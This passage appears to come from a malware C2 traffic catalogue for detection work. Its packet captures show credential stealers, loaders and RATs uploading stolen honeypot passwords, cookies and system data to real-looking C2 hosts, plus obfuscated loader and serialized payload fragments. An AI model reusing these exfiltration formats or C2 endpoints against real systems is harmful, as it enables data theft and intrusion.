base64\n\nSGF3a0V5ZSBLZXlsb2dnZXIgLSBSZWJvcm4gdjkNClBhc3N3b3JkcyBMb2dzDQphZG1p\nbiBcIFVTRVItUEMNCg0KPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09\nPT09PT09PT09PT09PT0NClVSTCAgICAgICAgICAgICAgIDogaHR0cHM6Ly9tLmZhY2Vi\nb29rLmNvbQ0KV2ViIEJyb3dzZXIgICAgICAgOiBGaXJlZm94IDMyKw0KVXNlciBOYW1l\nICAgICAgICAgOiBob25leUBwb3QuY29tDQpQYXNzd29yZCAgICAgICAgICA6IGhvbmV5\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/hawkeye.png \"Hawkeye\")\n\n#### Icedid\n~~~\nGET /photo.png?id=0181B9BACBCF3080870000000000FF40000001 HTTP/1.1\nConnection: Keep-Alive\nHost: eurobable.com\n\nHTTP/1.1 200 OK\nServer: openresty\nDate: Wed, 16 Oct 2019 15:30:33 GMT\nContent-Type: application/octet-stream\nContent-Length: 605211\nConnection: keep-alive\nLast-Modified: Tue, 08 Oct 2019 11:43:19 GMT\nETag: \"5d9c7657-93c1b\"\nAccept-Ranges: bytes\n\n.PNG\n.\n...\nIHDR..............N.T....sRGB.........gAMA......a....\tpHYs..........o.d.\t;.IDATOLrEV.....Le.D|...Rp.{..D...g`...a@.\\8,E\n.~1Z..X.N...^G.....,f$.c.......ru.#O..'.~.\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/icedid-2.png \"Icedid\")\n\nURI for websocket is usually data2.php\n~~~\nGET /data2.php?1C00C7CC98D464FE HTTP/1.1\nHost: memphase.com\nUpgrade: websocket\nConnection: Upgrade\n\nHTTP/1.1 101 Switching Protocols\nServer: openresty\nDate: Thu, 10 Oct 2019 19:28:34 GMT\nConnection: upgrade\nSec-WebSocket-Accept: Kfh9QIsMVZcl6xEPYxPHzW8SZ8w=\nUpgrade: websocket\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/icedid.png \"Icedid websocket\")\n\nNew Loader\n~~~\nGET / HTTP/1.1\nConnection: Keep-Alive\nHost: karantino.xyz\n\nHTTP/1.1 200 OK\nServer: nginx\nDate: Fri, 27 Mar 2020 16:07:26 GMT\nContent-Type: text/html\nContent-Length: 489\nConnection: keep-alive\nLast-Modified: Wed, 29 Jan 2020 08:16:06 GMT\nETag: \"5e313f46-1e9\"\nAccept-Ranges: bytes\n\n\n\n\t\n\t\t\n\t\t\n\t\t\n\n\t\tSite under reconstruction\n\t\t\n\t\n\t\n\t\n\nGET /background.png\n\nHTTP/1.1\nConnection: Keep-Alive\nCookie: __gads=3341780230:0:418500:437:83; _gat=10.0.16299.64; _ga=1.329443.0.66; _u=4445534B544F502D4A474C4C4A4C44:61646D696E; __io=21_1693682860_607145093_2874071422; _gid=92AA106A8DB0\nHost: karantino.xyz\n\nHTTP/1.1 200 OK\nServer: nginx\nDate: Fri, 27 Mar 2020 16:07:27 GMT\nContent-Type: image/png\nContent-Length: 314160\nConnection: keep-alive\n\n.PNG\n.\n...\nIHDR...............#&....sRGB.........gAMA......a....\tpHYs...\"...\".........IDATx^....lKz..e....>...0.f.s.... f...`...J...\"$...!Qv.a9...p..............6....|...+..#.2M.2\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/icedidloader.png \"IcedID Loader\")\n\n#### iDex Stealer\n~~~\nGET /index.php HTTP/1.1\nHost: etips.fun\nConnection: Keep-Alive\n\nHTTP/1.1 200 OK\nServer: nginx-reuseport/1.13.4\nDate: Fri, 03 Apr 2020 12:43:55 GMT\nContent-Type: text/html\nContent-Length: 216\nConnection: keep-alive\nKeep-Alive: timeout=30\nVary: Accept-Encoding\nX-Powered-By: PHP/7.1.33\nSet-Cookie: PHPSESSID=f9eaff206353e78017c4257960c13590; path=/\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\n\nYZAt44SJ3KsHldzHPnF8nveX4cBoS359sHzCXSUuwew/C6IEa7/zMjViaOVMK2EMfO1X+lcr24gD5S4LRuHREupBfWGdnGzfg5brXc1OuiMTRnOZ/iS9Vps9/B7Q+08m/137OU7V41UEx2QckwuZ9KeDTSjzmMv32Eewq0GUPiyQ5iFOOZ+8jGOXC1v8CsVqFfJYpKC2cCSLIQWDi6VzrQ==\n\nPOST /gate.php HTTP/1.1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccepts-Language: en-us,en;q=0.5\nContent-Type: multipart/form-data; boundary=---------------------------8d7d7ccad7ce23c\nHost: etips.fun\nContent-Length: 1191325\nExpect: 100-continue\n\n-----------------------------8d7d7ccad7ce23c\nContent-Disposition: form-data; name=\"hwid\"\n\nEEEB5D54788042A7B542739BBC26CF4B\n-----------------------------8d7d7ccad7ce23c\nContent-Disposition: form-data; name=\"os\"\n\nWindows 7 x64\n-----------------------------8d7d7ccad7ce23c\nContent-Disposition: form-data; name=\"platform\"\n\nnull\n-----------------------------8d7d7ccad7ce23c\nContent-Disposition: form-data; name=\"user\"\n\nadmin\n-----------------------------8d7d7ccad7ce23c\nContent-Disposition: form-data; name=\"passwordCount\"\n\n0\n-----------------------------8d7d7ccad7ce23c\nContent-Disposition: form-data; name=\"coins\"\n\n0\n-----------------------------8d7d7ccad7ce23c\nContent-Disposition: form-data; name=\"forms\"\n\n0\n-----------------------------8d7d7ccad7ce23c\nContent-Disposition: form-data; name=\"cookies\"\n\n0\n-----------------------------8d7d7ccad7ce23c\nContent-Disposition: form-data; name=\"ccCount\"\n\n0\n-----------------------------8d7d7ccad7ce23c\nContent-Disposition: form-data; name=\"telegram\"\n\n0\n-----------------------------8d7d7ccad7ce23c\nContent-Disposition: form-data; name=\"steam\"\n\nnull\n-----------------------------8d7d7ccad7ce23c\nContent-Disposition: form-data; name=\"logs\"; filename=\"Archive.zip\"\nContent-Type: zip\n\nPK........|e.P.R.y........=...Browsers/Cookies/Firefox Mozilla_nltxvmn2.default_Cookies.txt..]s.0.........r..b.V.Tk...CB.h......bggg........>y&..t2+u).26.>3.^..........(....$.C...o..n9.........P.4.fHTa9{OH.Q.I....?W...HG..&YC6\n..W.fR.9...x...E.r2..^..\"....hM..|n.......e.Ef`+.P .!Lm....B.a.MQj..T.3W$..1....J..c.....n.. ....Zg!v;.....c..7r4.......X....(....}U.^...;.k.>....7PK........|e.P....i...Jr......Screenshot.png..w8[...o\"v..G..Y#f..U]F......J.XE4}.......}...U...XuW.yq.|.....*.P....&.b.v.R.[......^.>..PK..........|e.P.R.y........=.................Browsers/Cookies/Firefox Mozilla_nltxvmn2.default_Cookies.txtPK..........}e.PpT.-.... ...+.................Browsers/Cookies/Chrome_Default_Cookies.txtPK..........|e.P....i...Jr................Y...Screenshot.pngPK..........}e.P?c .T...Z...\n.................Passwords.txtPK..........}e.P.s%.[...v.................m...Browsers.txtPK..........}e.PE.............................Information.txtPK....................iDex STEALER VERSION : 1.0.0\n==========================GEOIP Info==========================\nIP : 84.17.36.75\n Country : Sweden\nCountryCode : SE\nRegion : AB\nRegion Name : Stockholm\nCity : Stockholm\nZip : 164 94\nTimeZone : Europe/Stockholm\nISP : Datacamp Limited\n\n==========================Hardware Info==========================\n\nUsername : admin\nPCName : USER-PC\nUUID : 00371-461-1206131-85808\nHWID : EEEB5D54788042A7B542739BBC26CF4B\nOS : Windows 7 x64\nCPU : Intel(R) Core(TM) i5-6400 CPU @ 2.70GHz\nGPU : Standard VGA Graphics Adapter\nRAM : 4 GB\nMAC : 5254004AAD21\nScreen Resolution : 1280x720\nLayout Language : English (United States)\nPC Time : 4/3/2020 12:43:57 PM (UTC) Coordinated Universal Time\n\n==========================Program Info==========================\nAdobe Flash Player 27 ActiveX 27.0.0.187\n\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.21.27702 14.21.27702.2\n\n\n==========================Program Info==========================\nsvchost\nlsm\nsvchost\nspoolsv\nsvchost\nlsass\ndllhost\nSearchProtocolHost\nsvchost\ncsrss\ne197329d5376b93a60e67a43d5390a16dae5e813c2ee3708420a785d8b1b1a46\ncsrss\ndwm\nservices\nwindanr\nwininit\nsvchost\nSearchFilterHost\ntaskhost\nsvchost\nIMEDICTUPDATE\nSearchIndexer\nsvchost\nexplorer\nsvchost\nOSPPSVC\nSearchProtocolHost\nsvchost\nsvchost\nwinlogon\nsmss\nSystem\nIdle\n\n-----------------------------8d7d7ccad7ce23c--\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/idex1.png \"iDex\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/idex2.png \"iDex\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/idex3.png \"iDex\")\n\n#### iDex New aka MatrixMax stealer\n~~~\nPOST /gate.php HTTP/1.1\nContent-Type: application/x-www-form-urlencoded\nHost: max099801.000webhostapp.com\nContent-Length: 936413\nExpect: 100-continue\nConnection: Keep-Alive\n\nzipx=UEsDBBQAAAgIALOmj\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/idex-new.png \"iDex New\")\n\n#### Imminent RAT\n~~~\n00000000 06 00 00 00 81 13 14 6e 5b 69 .......n [i\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/imminent-1.png \"Imminent\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/imminent-2.png \"Imminent\")\n\n#### ISRStealer\n~~~\n\nGET /boss/index.php?action=add&username=honey@pot.com&password=honeypass356&app=Opera&pcname=USER-PC&sitename=https://www.facebook.com HTTP/1.1\nUser-Agent: HardCore Software For : Public\nHost: expressdeliveryfx.com\nCookie: PHPSESSID=ni2v6p8vt6p48qcvm48rj7qqt0\n\nHTTP/1.1 200 OK\nConnection: Keep-Alive\nX-Powered-By: PHP/5.6.40\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nPragma: no-cache\nContent-Type: text/html; charset=UTF-8\nContent-Length: 0\nDate: Tue, 08 Oct 2019 14:06:15 GMT\nServer: LiteSpeed\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/isrstealer.png \"ISRStealer\")\n\n#### JasperLoader\n~~~\nGET /?b=USER-PC_DELL_30fbefd6&os=6.1.7601.17514&v=327.2&psver=2 HTTP/1.1\nHost: green.datota.it\nConnection: Keep-Alive\n\nHTTP/1.1 200 OK\nServer: nginx/1.14.2\nDate: Thu, 28 Mar 2019 17:41:51 GMT\nContent-Type: text/html; charset=UTF-8\nContent-Length: 115\nConnection: keep-alive\nX-Powered-By: PHP/5.4.16\n\nu|http://red.greenmira.com/cryptbody2.php|http://red.greenmira.com/loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php\n~~~\n~~~\nGET /cryptbody2.php?b=USER-PC_DELL_30fbefd6&os=6.1.7601.17514&v=327.2&psver=2 HTTP/1.1\nHost: red.greenmira.com\nConnection: Keep-Alive\n\nHTTP/1.1 200 OK\nServer: nginx/1.14.2\nDate: Thu, 28 Mar 2019 17:41:51 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nX-Powered-By: PHP/5.4.16\n\nt6i3jf5s(h6 ac(wtGite5ite0-bdUsaI53Cwfu52ls4tf6u0eryze76)3x.ccNi3af5mtdex4 6y-76m4da05tu1cijhzw jz'02RdtU7i|v2UjsAzu|86BcxYtz|0gCehNuh'hw 4a-ixo07rwg 9v(tcGh3exdtai-bwWa7m7sixdOyibybjxfe6zcxdtja cj-86cjdls1awisu3s7b c1W35i3dn1s36z2iz_hgCvuo36m3aphxucyt6je9ersbShuyxxsxittfeyhm5y xc-8vP5arw5o17pujed4r44t1iyhu i4Mfsowedude2vlie)0a.cdMt6ovtdybe6xl09 bs-xumu1ah8tefc94ht3 8x'3iV87Mftwvya20r74ej8'3h ac)3x{w7 ydeyaxueijjtus;sg 6w}zw e2 \nezFavu0vnavc66tztiv2owhnx9 yeChzr9cecja02ty3eu6Suvh7uo42rc3tg9ci9u49tdu(1j 2z$f7lvbngfk0y,a4 7c$etAehrfegz5uzbm98eyhnaft7zsf4,fc zz$efW2johbr28kihihfnvcga5Divijar2sezyc9ithxog6rxty39 1f)t1{eb \nvv yw 5bt3wrt1ytu{ai \ncc 01 wb tz b9$41Sz9hbheacly2l64 us=sh gbNz\n~~~\n~~~\nGET /loadercrypt_823EF8A810513A4071485C36DDAD4CC3.php?b=USER-PC_DELL_30fbefd6&os=6.1.7601.17514&v=327.2&psver=2 HTTP/1.1\nHost: red.greenmira.com\n\nHTTP/1.1 200 OK\nServer: nginx/1.14.2\nDate: Thu, 28 Mar 2019 17:41:51 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nX-Powered-By: PHP/5.4.16\n\nvtyzhsjuxvzxhbgfsdzdzzb = \" \";\nibcvwj = new Array();\nibcvwj.push(\"iavSxyfERDVE(t8E8a974CDQ6y\");\nibcvwj.push(\"\");\nibcvwj.push(\"885tSDCB4aw\");\nibcvwj.push(\"wR6EREzW>CzEz54zRy361wRDt97y\");\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/jasperloader.png \"JasperLoader\")\n\n#### JsOutProx\n~~~\nPOST / HTTP/1.1\nConnection: Keep-Alive\nContent-Type: application/x-www-Form-urlencoded; Charset=UTF-8\nAccept: */*\nAccept-Encoding: gzip, deflate\nCookie: _uot=43344241333634375f7c5f38396139633066382d393535362d346339662d626363642d6330373464646331346230395f7c5f555345522d50435f7c5f61646d696e5f7c5f4d6963726f736f66742057696e646f777320372050726f66657373696f6e616c205f7c5f362e312e373630315f7c5f4a734f757450726f785f7c5f70696e67\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:70.0) Gecko/20100101 Firefox/70.0\nContent-Length: 0\nHost: 91.189.180.199:9989\n\nHTTP/1.1 200 OK\nContent-Type: image/jpeg\nSet-Cookie: _utl=73646e5f7c5f\nContent-Length: 20164\nConnection: close\n\nAAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xkZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkDAAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRUeXBlTmFtZQptZXRob2ROYW\n~~~\nHex decoded cookie example from above:\n~~~\nC4BA3647_|_89a9c0f8-9556-4c9f-bccd-c074ddc14b09_|_USER-PC_|_admin_|_Microsoft Windows 7 Professional _|_6.1.7601_|_JsOutProx_|_ping\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/jsoutprox.png \"JsOutProx\")\n\n#### JSSLoader\n~~~\nPOST /gate.php?bot_id=JenniferPCJENNIFERPCVMware564db87746ebb934e9e0b94b413682b8 HTTP/1.1\nContent-Type: application/json\nHost: dempoloka.com\nContent-Length: 242\nExpect: 100-continue\nConnection: Keep-Alive\n\nAAAAAA==\nAQAAAA==\nVGhlIGlucHV0IGlzIG5vdCBhIHZhbGlkIEJhc2UtNjQgc3RyaW5nIGFzIGl0IGNvbnRhaW5zIGEgbm9uLWJhc2UgNjQgY2hhcmFjdGVyLCBtb3JlIHRoYW4gdHdvIHBhZGRpbmcgY2hhcmFjdGVycywgb3IgYW4gaWxsZWdhbCBjaGFyYWN0ZXIgYW1vbmcgdGhlIHBhZGRpbmcgY2hhcmFjdGVycy4g\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/jssloader.png \"JSSLoader\")\n\n#### Keybase\n~~~\nGET /panel/post.php?type=passwords&machinename=USER-PC&application=MS%20Outlook%202002/2003/2007/2010&link=192.168.1.1&username=honey@pot.com&password=honeypass356 HTTP/1.1\nHost: pacificglobal.ga\nConnection: Keep-Alive\n\nHTTP/1.1 200 OK\nServer: nginx\nDate: Fri, 04 Oct 2019 19:55:10 GMT\nContent-Type: text/html\nContent-Length: 985\nConnection: keep-alive\nVary: Accept-Encoding\nExpires: Thu, 01 Jan 1970 00:00:01 GMT\nCache-Control: no-cache\n\n\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/keybase.png \"Keybase\")\n\n#### Koadic\n~~~\nPOST /html?CRADZPYFZ4=825b2f6bafed407c88254aa1e804be93;9Q90FBZM0Q=; HTTP/1.1\nConnection: Keep-Alive\nContent-Type: application/octet-stream\nAccept: */*\nAccept-Language: en-us\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\nencoder: 1252\nshellchcp: 437\nContent-Length: 140\nHost: googlechromeupdater.twilightparadox.com:448\n\nUSER-PC\\admin~~~USER-PC~~~Windows 7 Professional***7601~~~Unknown~~~x86~~~C:\\Users\\admin\\AppData\\Local\\Temp\n~~~192.168.100.159~~~1252~~~437\n\nHTTP/1.0 200 OK\nServer: Apache\nDate: Wed, 22 Jan 2020 16:29:00 GMT\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/koadic.png \"Koadic\")\n\n#### Kpot stealer\nFollow tcp stream, not http stream in wireshark\n~~~\nGET /ImgcsQGM6ZclLvqr/conf.php HTTP/1.1\nConnection: Keep-Alive\nContent-Type: application/x-www-form-urlencoded\nHost: allseasongudinc.tech\n\nHTTP/1.1 200 OK\nServer: nginx\nDate: Tue, 27 Aug 2019 13:52:09 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\nX-Powered-By: PHP/7.1.28\n\n194\nKwV4X3wlPk10s8hXH869gjRybIA8vP7vCwSm1Z2WW5LpEMiELVOQvustrfDp9B9igx9Jz8+noWaPlvipqvlX1nEJsgEGpkK29iHNRB5rmSyH9hPAko1ndCVOfVjGwUO/THlWJSdlDlb0FyJA2+ji7xH/Hlcwx38AIJ1SHUpp+hYHUnavdTv5uJnIAoB23+3dt7f1I54mr2Pp+eddWPHgFeIL/2BeLqaWQL1IzY1EqZhS9oIluDYmojSWgWeu6mecE5suxDRksh0KOyA7518HX4ziYflt6gBOa+daqP42C7K7PspsZGUMTRIRKayAQIT84HYmE7a/jRK1twsOz8gdJIrbaOTLaZWx/4q3Nd8bAB2yH8PvCwRz2YVsmzjBv93n3ksOHYuFtO1GcnOk0Igj\n0\n\nPOST /ImgcsQGM6ZclLvqr/conf.php HTTP/1.1\nConnection: Keep-Alive\nContent-Type: application/octet-stream\nContent-Encoding: binary\nHost: allseasongudinc.tech\nContent-Length: 1965022\n\nP@F,jbhNH2pUP_s..tzH\tW-.z.Cb]_u.PBCy9bhNH2pUdoG4PBCy9bhNH2pUdo.r...<|XH\t:S.7...U 2'.M.4.!Q.:..!@..*.]\n.=.q.:..\"G..,.eP+...I.%A3L$OI4l+,.B.@.R+rqh{w@.TP.p.5`]+~\n.{vA\tTQ.y8.%\nA%]>%m.V.GDq.Acn]v.b{vK.U^D{.GbTVs.ZqsO.[]xx.I_W_q.ir{H3Hbn.t6.-#.q...?p.-.r.7'.\n%Q\".\"\tI.\t:)n=<..(G?$7%n..*'E.\t'.(_9'0%u\n..qcE.1;.b~6;\n4h;..z4_%)z}...Mxh\n'&U^6..h>arqM3T[vy.Fmn\\w.c{vM.h[~~.I`R_t\nZqsO.[Xvy8Z_7=.|...so_Zh.g9.YZv.`..HxS+\n}.3.S-u..tw8z![~xq6a&I#Y>!+..Sb,!\\.{..*.ZssK\nh^}p.Ec\\et.hqzL\nPb}x.FlQYw.iHpI.UQ~p.z.n<.w...+3&'.u.@d\\_~.eH!.W.F-'___U_u.ZtpA.W^vB.@mWVr.bHpI.TQ{~.Cln\\w.g{sA.hBDhm6.\"&.q...?.+$.\n.P...%V50..I../\n;.qSZ#7.T.F-'___V^s.d{qA.Vb}~.IgRYv.fHpI.SX{q.zfVZv.hpuI.h[~~.Ie\\^M.Z..73SF.}.GmQ_s.`lrI.RZw{.Fd\\\\s.gsqL.ZF..x$$U#.ea.\".W.<-x.z4..*@~!,..hZ.|.DlVWq.ZqtO.U_{{.@_W_..iqwI3QZ{x.Hm\\Zu>cruN.RP.B.zu;).r...\t>8V.!.3\n]30,\nV....[.1..4h.-,.P....].\t/;.b...N...:E8.4..Me\";3..Q.}0m .>)&A.'9.P6'D.S.0..(_~!,..hQ|y.zfR^~.gwpO\th[~p.IfP_M.arwL.QZ|\n~~~\n~~~\nGET /admtest/configuration.php?botid=BEF522C314BC1291311131 HTTP/1.1\nHost: 213.226.100.184\nConnection: Keep-Alive\nCache-Control: no-cache\n\nHTTP/1.1 200 OK\nServer: nginx/1.10.3 (Ubuntu)\nDate: Mon, 13 Jul 2020 08:26:56 GMT\nContent-Type: text/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: keep-alive\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/kpot.png \"Kpot stealer\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/kpot2.png \"Kpot stealer\")\n\n#### KrugBot\n~~~\nPOST /absc/index.php HTTP/1.0\nHost: raiseyourdongers.wtf\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 224\n\ntSVkhHUFWeXjujTxCNBQl7h1QW2zElMRx+g8ceDNF/4mUj4PV8MaCjFjhqCGYGprTPLjXu5i\nw+xWBGqDB44jDCJcr66AgCqhZYhj04B5PCPqMNaf8It2IfuX9Ffysaqp+tjcUhGW3JH1nJk8\nud1kko0C6+v/tp2PLOVR0ac3GacRi0dUf/+ASue6AJNOfh4WliURnubviRXJkcj+5f7vA3Xa\njg==\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/krugbot.png \"Krugbot\")\n\n#### Krypton Stealer\n~~~\nPOST /connect_meta.php HTTP/1.1\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Client\nHost: orl05511cn.temp.swtest.ru\nContent-Length: 26\nCache-Control: no-cache\n\nid=01&message=test_message\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/krypton.png \"KryptonStealer\")\n\n#### Lazagne\n~~~\nPOST /te.php HTTP/1.1\nContent-Type: multipart/form-data; boundary=---------------------------58748130728276\nUser-Agent: Mozilla/5.0 Gecko/20100115 Firefox/3.6\nHost: 185.86.148.123\nContent-Length: 1526\nCache-Control: no-cache\n\n-----------------------------58748130728276\nContent-Disposition: form-data; name=\"userfile\"; filename=\"admin-USER-PC-passwords.txt\"\nContent-Type:application/x-gzip\n\n\n########## User: admin ##########\n\n------------------- Firefox passwords -----------------\n\n[+] Password found !!!\nURL: https://m.facebook.com\nLogin: honey@pot.com\nPassword: honeypass356\n\n------------------- Outlook passwords -----------------\n\n[-] Password not found !!!\nAccount Name: honey@pot.com.\nPOP3 User: honey@pot.com.\nPOP3 Server: 192.168.1.1.\nu'Delivery Store EntryID: \\x00\\x00\\ua138\\u10bb\\ue505\\u1a10\\ubba1\\x08\\u2a2b\\uc256\\x00\\u736d\\u7370\\u2e74\\u6c64l\\x00\\x00\\u494e\\u4154\\ubff9\\u01b8\\uaa00\\u3700\\u6ed9\\x00\\x00C:\\\\Users\\\\admin\\\\Documents\\\\Outlook Files\\\\honey@pot.com.pst\\x00'\nSMTP Secure Connection: 0\nSMTP Server: 192.168.1.1.\nMini UID: 224868084\n'Delivery Folder EntryID: \\x00\\x00\\x00\\x00\\x81 \\xa1\\x9f\\x92\\x06>N\\x9c\\xc7t\\xd9H\\xba>f\\x82\\x80\\x00\\x00'\nu'clsid: \\u457b\\u3444\\u3537\\u3134\\u2d31\\u3042\\u3644\\u312d\\u4431\\u2d32\\u4338\\u4233\\u302d\\u3130\\u3430\\u3242\\u3641\\u3736\\u7d36'\nDisplay Name: HoneyPot Mail.\nPOP3 Password: honeypass356.\nEmail: honey@pot.com.\nu'Leave on Server: \\u3139\\u3537\\u3730'\n\n------------------- Google chrome passwords -----------------\n\n[+] Password found !!!\nURL: \nLogin: honey@pot.com\nPassword: honeypass356\n\n\n[+] 3 passwords have been found.\nFor more information launch it again with the -v option\n\nelapsed time = 0.84299993515\n\n-----------------------------58748130728276--\n\nHTTP/1.1 200 OK\nDate: Tue, 29 Oct 2019 21:10:11 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Length: 1\nContent-Type: text/html; charset=UTF-8\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/lazagne.png \"Lazagne\")\n\n#### Loda\nI've never seen this without the beta flah\n~~~\nx|lugocv|x|admin|WIN_7|X86| |Disabled|1.1.2|ddd|Pr720X21280X3|Desktop|0|beta\n\nZeXro0\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/loda.png \"Loda\")\n\n#### Lokibot\n\nfollw tcp stream, not http stream in wireshark\n~~~\nPOST /sky/five/fre.php HTTP/1.0\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\nHost: fueda.info\nAccept: */*\nContent-Type: application/octet-stream\nContent-Encoding: binary\nContent-Key: 8DAA705A\nContent-Length: 176\nConnection: close\n\n..'.......ckav.ru..\n...a.d.m.i.n.......U.S.E.R.-.P.C.......U.S.E.R.-.P.C......................+................0...8.5.6.9.A.A.F.F.6.3.A.A.A.7.1.D.8.0.4.0.0.E.2.5.....Rqbay....\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/lokibot.png \"Lokibot\")\n\n#### Metamorpho/Metamorfo BR Banker\n~~~\nPOST / HTTP/1.0\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 249\nHost: 18.217.112.176\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Encoding: identity\nUser-Agent: Mozilla/3.0 (compatible; Indy Library)\n\nspxndja=HERETEVFDEVFJERERFEERFFEXERFJFGFKER&kfcemfgj=CCO&gvtsavp=EFMFM&ixjpblda=HEDEEDOEGDODXCPDKDMDMDYEFDXEEDSCMEHFAFFCCDACMCTCSCMDCCXCQCSDUDLCMCMDOFFEXFDFAFKEYCCCKEFFFFAFLEVEUCCEDFLERFLEVFKCLCMCMEHFAFFEUFGFOFKCCDNEVEWEVFFEUEVFJCMCYCWDLCM&xhwen=YDL\n\nHTTP/1.1 200 OK\nDate: Fri, 19 Jul 2019 15:18:12 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Length: 0\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text/html; charset=UTF-8\n\nHTTP/1.1 200 OK\nDate: Fri, 19 Jul 2019 15:18:12 GMT\nServer: Apache/2.4.18 (Ubuntu)\nContent-Length: 0\nKeep-Alive: timeout=5, max=100\nConnection: Keep-Alive\nContent-Type: text/html; charset=UTF-8\n~~~\n~~~\nPOST /hooponopono/puma.php HTTP/1.0\nConnection: keep-alive\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 158\nHost: leavenois.com\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nUser-Agent: Mozilla/3.0 (compatible; Indy Library)\n\nvv=OP22--22-10&vw=&mods=&uname=VVNFUi1QQw%3D%3D&cname=Ti05Ng%3D%3D&os=V2luZG93cyA3IFByb2Zlc3Npb25hbDYuMTc2MDEtNjQ%3D&is=&iss=SUUuQXNzb2NGaWxlLkhUTQ%3D%3D&iav=\n\nHTTP/1.0 200 OK\nConnection: Keep-Alive\nContent-Type: text/html; charset=UTF-8\nContent-Length: 0\nDate: Tue, 22 Oct 2019 20:06:32 GMT\nServer: LiteSpeed\n~~~\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/metamorpho.png \"Metamorpho\")\n![alt text](https://github.com/silence-is-best/c2db/blob/master/images/metamorfo-1.png \"Metamorpho\")\n\n#### Micropsia\n~~~\nPOST /api/white_walkers/new HTTP/1.1\nConnection: KeepAlive\nContent-Type: multipart/form-data; boundary=--------121819110609549\nContent-Length: 818\nCache-control: no-store\nHost: accountforuser.website\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nUser-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\n\n----------121819110609549\nContent-Disposition: form-data; name=\"daenerys\"\nContent-Type: text/plain; charset=\"utf-8\"\nContent-Transfer-Encoding: 8bit\n\nSkVOTklGRVItUENfSmVubmlmZXJfNUZ0MzNidWxETUMybzVG\n----------121819110609549\nContent-Disposition: form-data; name=\"betriebssystem\"\nContent-Type: text/plain; charset=\"utf-8\"\nContent-Transfer-Encoding: 8bit\n\nWindows 7 Service Pack 1 (Version 6.1, Build 7601, 64-bit Edition)\n----------121819110609549\nContent-Disposition: form-data; name=\"anwendung\"\nContent-Type: text/plain; charset=\"utf-8\"\nContent-Transfer-Encoding: 8bit\n\nExecuteLibrary.exe v2.0.0\n----------121819110609549\nContent-Disposition: form-data; name=\"AV\"\nContent-Type: text/plain; charset=\"utf-8\"\nContent-Transfer-Encoding: 8bit\n\nNo Instance(s) Available.\n----------121819110609549--\n~~~\n![alt 